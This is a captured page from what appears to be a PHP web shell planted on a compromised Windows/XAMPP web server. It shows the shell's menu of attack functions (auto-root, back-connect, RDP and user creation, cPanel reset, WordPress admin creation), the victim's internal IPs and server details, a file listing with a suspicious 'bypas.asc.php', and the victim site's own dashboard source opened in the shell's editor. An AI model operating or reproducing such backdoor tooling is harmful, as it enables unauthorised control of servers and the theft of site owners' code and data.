Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
htdocs /
edgpens /
dashboard /
[ HOME SHELL ]
Name
Size
Permission
Action
bypas.asc.php
1.71
KB
-rw-rw-rw-
d1_1.php
1.88
KB
-rw-rw-rw-
d1_2.php
2
KB
-rw-rw-rw-
d1_3.php
1.84
KB
-rw-rw-rw-
d2.php
2.57
KB
-rw-rw-rw-
d3.php
9.72
KB
-rw-rw-rw-
d4.php
5.45
KB
-rw-rw-rw-
main.php
1.1
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : d2.php
<?php include_once "../access_inc.php"; ?> <?php $q1="SELECT COUNT(*) as bil, flagDG FROM permohonan_main WHERE submit='Y' AND status!='R' GROUP BY flagDG"; $res1=mysqli_query($mysqli_link,$q1) or die(mysqli_connect_error()); $stmt = $mysqli->stmt_init(); $stmt->prepare("SELECT COUNT(*) as bil, flagDG FROM permohonan_main WHERE submit='Y' AND status!='R' GROUP BY flagDG") ; $stmt->execute(); $result = $stmt->get_result(); $stmt->close(); ?> <script type="text/javascript"> google.charts.load("current", {packages:["corechart"]}); google.charts.setOnLoadCallback(drawChart); function drawChart() { var data = google.visualization.arrayToDataTable([ ['TYPE', 'NO'], <?php while($aa = $result->fetch_assoc()){ if($aa["flagDG"]=="Y"){ $tot1 = $aa['bil']; $type = "PENS + DG"; }else{ $tot2 = $aa['bil']; $type = "PENS"; } echo "['".$type."', ".$aa["bil"]."],"; } ?> ]); var options = { //title: 'My Daily Activities', is3D: true, // legend: 'none', legend: {position: 'labeled', textStyle: {color: 'black', bold: true}}, colors: ['#1b9e77', '#fa8654', '#99cc00', '#d95f02', '#9797ff', '#DEB25C'], //pieHole: 0.5, // pieStartAngle: 100, pieSliceText: 'none', chartArea: {'width': '100%', 'height': '100%'}, backgroundColor: "transparent" }; var chart = new google.visualization.PieChart(document.getElementById('piechart_3d')); chart.draw(data, options); $(window).smartresize(function () { chart.draw(data, options); }); // $(window).trigger("resize"); } $(document).ready(function(){ // $(window).trigger("resize"); $('#row-grid').isotope('layout'); }); </script> <div class="widget"> <div class="widget-content border-bottom text-dark"> <span class="pull-right text-muted">This Month</span> <?php echo $dtitle; ?> </div> <div class="widget-content border-bottom themed-background-muted"> <div id="piechart_3d"></div> </div> <div class="widget-content widget-content-full-top-bottom"> <div class="row text-center"> <div class="col-xs-6 border-right"> <h3 class="widget-heading text-dark push-bit"><?php echo $tot2; ?><BR><small>PENS</small></BR><span data-toggle="counter" data-to="<?php echo $rslt['tot_permohonan'];?>" ></span></h3> </div> <div class="col-xs-6"> <h3 class="widget-heading text-dark push-bit"><?php echo $tot1; ?></i><BR><small>PENS + DG</small></BR><span data-toggle="counter" data-to="<?php echo $rslt['tot_ack'];?>"></span></h3> </div> </div> </div> </div>
Close